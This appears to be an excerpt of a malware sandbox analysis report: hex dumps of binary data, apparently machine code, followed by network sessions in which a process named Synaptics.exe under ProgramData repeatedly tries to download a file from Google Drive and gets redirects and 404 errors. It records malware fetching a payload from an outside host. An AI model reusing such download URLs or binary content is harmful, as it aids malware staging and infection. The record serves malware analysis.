                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: 4d 00 8d 55 d8 52 c7 45 d8 50 20 4c 00 e8 77 7c 07 00 8b 45 08 8b 4d ec 89 45 e4 40 89 65 f0 50 c6 45 fc 02 e8 5a 03 00 00 89 45 08 b8 ff c9 40 00 c3 8b 7d ec 8b 75 e4 8b 5d 0c 85 db 76 20 83 7f 18 10 72 05 8b 47 04 eb 03 8d 47 04 8b 4d 08 53 50 8d 46 01 50 51 e8 a1 7b 07 00 83 c4 10 83 7f 18 10 72 0c 8b 57 04 52 e8 03 7b 07 00 83 c4 04 8b 4d 08 8d 47 04 c6 00 00 89 08 89 77 18 89 5f 14 83 fe 10 72 02 8b c1 c6 04 18 00 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 08 00 8b 75 ec 83 7e 18 10 72 0c 8b 46 04 50 e8 be 7a 07 00 83 c4 04 6a 00 c7 46 18 0f 00 00 00 c7 46 14 00 00 00 00 6a 00 c6 46 04 00 e8 b8 7b 07 00 cc cc 56 57 8b 7c 24 0c 85 ff 74 2c 8b 71 18 8d 41 04 83 fe 10 72 04 8b 10 eb 02 8b d0 3b fa 72 17 83 fe 10 72 02 8b 00 8b 49 14 03 c8 3b
                                                                                                                                                                    Data Ascii: MUREP Lw|EME@ePEZE@}u]v rGGMSPFPQ{rWR{MGw_rMdY_^[]u~rFPzjFFjF{VW|$t,qAr;rrI;
                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: 8d 74 24 2c e8 ba 00 00 00 8d 44 24 0c e8 81 04 00 00 eb 3e 53 8d 4c 24 10 e8 35 f8 ff ff 83 c4 04 8d 74 24 2c e8 99 00 00 00 c7 44 24 48 ff ff ff ff 8b 44 24 0c 83 c0 f0 83 ca ff 8d 48 0c f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 b8 01 00 00 00 8b 4c 24 40 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 06 a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 46 04 a1 a4 cd 4e 00 8b 50 0c b9 a4 cd 4e 00 ff d2 83 c0 10 89 46 08 8b c6 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 46 08 83 e8 10 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 46 04 83 e8 10 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04
                                                                                                                                                                    Data Ascii: t$,D$>SL$5t$,D$HD$HJPBL$@dY_^]NPNNPNFNPNFFHJPBFHJPB
                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: 89 9c 24 74 04 00 00 68 02 00 00 80 89 5c 24 34 ff 15 40 e0 4b 00 3b c3 0f 85 bc 00 00 00 8b 7c 24 20 33 c0 89 7c 24 34 89 5c 24 38 89 44 24 2c 8d 49 00 8d 54 24 3c 52 53 53 53 8d 4c 24 2c 51 8d 94 24 60 02 00 00 52 50 be 04 01 00 00 57 89 74 24 3c ff 15 28 e0 4b 00 85 c0 0f 85 44 01 00 00 89 5c 24 14 89 5c 24 18 8d 44 24 28 50 6a 01 53 8d 8c 24 58 02 00 00 51 c6 84 24 74 04 00 00 01 57 89 5c 24 3c ff 15 40 e0 4b 00 3b c3 75 51 8b 6c 24 28 68 88 e6 4c 00 8d 54 24 18 89 74 24 20 52 8d 7c 24 24 8d 74 24 4c 89 6c 24 1c 89 5c 24 20 e8 6c db ff ff 85 c0 74 36 88 9c 24 64 04 00 00 3b eb 74 0b 55 ff 15 3c e0 4b 00 89 5c 24 14 89 5c 24 18 e9 b3 00 00 00 33 c0 e9 ef 00 00 00 88 9c 24 64 04 00 00 89 5c 24 18 e9 9c 00 00 00 8d 44 24 44 50 e8 87 64 07 00 83 c4 04 83
                                                                                                                                                                    Data Ascii: $th\$4@K;|$ 3|$4\$8D$,IT$<RSSSL$,Q$`RPWt$<(KD\$\$D$(PjS$XQ$tW\$<@K;uQl$(hLT$t$ R|$$t$Ll$\$ lt6$d;tU<K\$\$3$d\$D$DPd
                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: 00 ff 74 24 14 ff 31 ff 15 44 e0 4b 00 c2 08 00 55 8b ec 83 7d 0c 00 56 8b f1 75 05 6a 0d 58 eb 21 ff 75 0c ff 15 78 e3 4b 00 8d 44 00 02 50 ff 75 0c ff 75 10 6a 00 ff 75 08 ff 36 ff 15 44 e0 4b 00 5e 5d c2 0c 00 53 56 8b 74 24 10 8b d9 85 f6 75 05 6a 0d 58 eb 2d 57 33 ff 56 ff 15 78 e3 4b 00 40 8d 0c 00 03 f1 03 f9 83 f8 01 75 ec 57 ff 74 24 18 6a 07 6a 00 ff 74 24 20 ff 33 ff 15 44 e0 4b 00 5f 5e 5b c2 08 00 ff 74 24 08 ff 74 24 08 ff 15 68 e3 4b 00 f7 d8 1a c0 fe c0 c3 b8 09 00 02 80 c2 04 00 8b 01 6a 27 59 66 3b 08 75 13 50 ff 15 64 e5 4b 00 6a 27 59 66 3b 08 74 04 33 c0 40 c3 33 c0 c3 8b 44 24 04 83 f8 64 56 8b f1 7d 05 b8 e8 03 00 00 83 26 00 6a 02 50 89 46 04 e8 88 fc ff ff 59 59 89 46 08 85 c0 74 05 33 c9 66 89 08 8b c6 5e c2 04 00 ff 71 08 ff 15
                                                                                                                                                                    Data Ascii: t$1DKU}VujX!uxKDPuuju6DK^]SVt$ujX-W3VxK@uWt$jjt$ 3DK_^[t$t$hKj'Yf;uPdKj'Yf;t3@3D$dV}&jPFYYFt3f^q
                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: 00 56 8b f1 8b 0e 85 c9 74 08 e8 dc fd ff ff 83 26 00 5e c3 55 8b ec 83 7d 08 00 56 57 8b f9 75 0a 68 57 00 07 80 e8 b8 15 ff ff ff 75 0c ff 75 08 e8 fb a1 06 00 59 59 8b f0 56 8b cf e8 f1 04 ff ff ff 75 0c 8d 4e 01 ff 75 08 51 50 e8 27 a4 06 00 83 c4 10 56 8b cf e8 06 05 ff ff 5f 5e 5d c2 08 00 56 8b f1 6a 00 6a 00 8d 4e 14 e8 70 ad ff ff 85 c0 75 0d 6a 0e ff 15 64 e3 4b 00 83 c8 ff eb 2d 56 83 c6 08 56 68 c0 cd 4e 00 e8 18 cc ff ff ff 74 24 0c 68 6b a9 41 00 ff 74 24 10 68 81 00 00 00 ff 35 34 cd 4e 00 ff 15 84 e5 4b 00 5e c2 08 00 e9 48 ff ff ff 6a 00 b8 e9 40 4b 00 e8 8f 89 06 00 8b 45 08 83 65 fc 00 85 c0 74 04 8b 00 eb 02 33 c0 8b 11 50 51 ff 52 0c 8b 4d 08 8b f0 85 c9 74 05 e8 00 fd ff ff 8b c6 e8 3a 8a 06 00 c2 04 00 6a 00 b8 0c 41 4b 00 e8 53 89
                                                                                                                                                                    Data Ascii: Vt&^U}VWuhWuuYYVuNuQP'V_^]VjjNpujdK-VVhNt$hkAt$h54NK^Hj@KEet3PQRMt:jAKS
                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: ff 44 0a 35 3e c7 85 a4 fd ff ff d5 cd b4 bc c7 85 a8 fd ff ff a8 ce ea 72 c7 85 ac fd ff ff bb 84 64 fa c7 85 b0 fd ff ff ae 12 66 8d c7 85 b4 fd ff ff 47 6f 3c bf c7 85 b8 fd ff ff 63 e4 9b d2 c7 85 bc fd ff ff 9e 5d 2f 54 c7 85 c0 fd ff ff 1b 77 c2 ae c7 85 c4 fd ff ff 70 63 4e f6 c7 85 c8 fd ff ff 8d 0d 0e 74 c7 85 cc fd ff ff 57 13 5b e7 c7 85 d0 fd ff ff 71 16 72 f8 c7 85 d4 fd ff ff 5d 7d 53 af c7 85 d8 fd ff ff 08 cb 40 40 c7 85 dc fd ff ff cc e2 b4 4e c7 85 e0 fd ff ff 6a 46 d2 34 c7 85 e4 fd ff ff 84 af 15 01 c7 85 e8 fd ff ff 28 04 b0 e1 c7 85 ec fd ff ff 1d 3a 98 95 c7 85 f0 fd ff ff b4 9f b8 06 c7 85 f4 fd ff ff 48 a0 6e ce c7 85 f8 fd ff ff 82 3b 3f 6f c7 85 fc fd ff ff 82 ab 20 35 c7 85 00 fe ff ff 4b 1d 1a 01 c7 85 04 fe ff ff f8 27 72 27
                                                                                                                                                                    Data Ascii: D5>rdfGo<c]/TwpcNtW[qr]}S@@NjF4(:Hn;?o 5K'r'
                                                                                                                                                                    2024-12-30 03:59:04 UTC16384INData Raw: 33 ff 39 be f0 10 00 00 0f 84 d4 01 00 00 8b 45 10 8d 4e 08 89 86 04 11 00 00 89 be f4 10 00 00 e8 98 cc ff ff 8d 9e cc 10 00 00 8b cb 89 5d f0 e8 bc 99 ff ff ff 75 0c 89 7e 4c 8d 7e 58 8b cf e8 15 92 ff ff 57 e8 bb 94 ff ff c7 04 24 5c 11 4c 00 ff 37 e8 0d 02 06 00 f7 d8 59 1b c0 59 40 8d 4d d0 89 86 f8 10 00 00 e8 cc d3 ff ff 83 65 fc 00 8d 4d e8 e8 c0 d3 ff ff 8d 45 e8 50 8d 45 d0 50 ff 75 08 c6 45 fc 01 e8 c3 94 ff ff 83 c4 0c 8b cf e8 d7 90 ff ff 83 f8 03 0f 82 20 01 00 00 8d 4d d0 e8 c6 90 ff ff 83 f8 02 0f 82 0f 01 00 00 8d 4d e8 e8 b5 90 ff ff 83 f8 02 0f 82 fe 00 00 00 8d 7e 60 8b 07 33 c9 66 89 08 8d 4d d8 e8 48 d3 ff ff 8d 4d e0 c6 45 fc 02 e8 3c d3 ff ff bb a6 3d 42 00 eb 45 8b cf e8 80 90 ff ff 85 c0 74 71 57 8d 4d e8 e8 5e 91 ff ff ff 75 e0
                                                                                                                                                                    Data Ascii: 39EN]u~L~XW$\L7YY@MeMEPEPuE MM~`3fMHME<=BEtqWM^u


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    1192.168.2.449739142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:08 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ExyB9bjuO92GdfrlgJ75OA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    2192.168.2.449738142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:07 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:08 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:07 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--LEOwFsMCcjLPnxLcgdHpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    3192.168.2.449744142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:08 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:08 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZE_MQgg3s6yc8tJNQoSzpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    4192.168.2.449746142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:08 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    2024-12-30 03:59:09 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:09 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-vxcstN03jBnPRmOW02ipaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    5192.168.2.449745142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:08 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-30 03:59:09 UTC1601INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC6TKuRk0hgUk2Tb9kjOxkBIeSTsrnF1u8g4YV721yB-sW5Fz-CpvLZgaHxjghT7i1sgMsch1HM
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:09 GMT
                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UV5JMyfHuzI85Fe0L9FSmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Set-Cookie: NID=520=PHLPwFBV3nP3NSbmBNppx94wfdqPQl4Q-izB7Q9f0_bxaxWANYb1QcaTubhKjd2R6xySamhdnl-RYaDARyDu81yP1iK-V-e7E34pqVgPJwxEHcLMQ5b4PH3P0YYqID63fImAuLFJ1XTfSeu5RvIPc-V_WgPJ4D2Xww1UxfxNrV61NdVFmp2YgJg; expires=Tue, 01-Jul-2025 03:59:08 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:09 UTC1601INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 42 6e 6a 6e 66 5f 77 47 63 76 39 62 4a 6f 70 4f 7a 47 66 79 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Bnjnf_wGcv9bJopOzGfyYg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                    2024-12-30 03:59:09 UTC51INData Raw: 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: his server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    6192.168.2.449747142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:08 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    2024-12-30 03:59:09 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4ONYrnS6TaNGgqv6UdqQtrihFlHsGikp1VWLQsCFtZphjcPmmJJ0AVXQHzumzqY7pM
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:09 GMT
                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ZCQ-PQ88OSpNFbRdm_0DlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Set-Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ; expires=Tue, 01-Jul-2025 03:59:09 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:09 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 77 4d 4e 6b 6b 65 37 4e 6a 6a 79 74 59 74 67 65 5f 79 59 54 6c 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="wMNkke7NjjytYtge_yYTlw">*{margin:0;padding:0}html,code{font:15px/22px arial
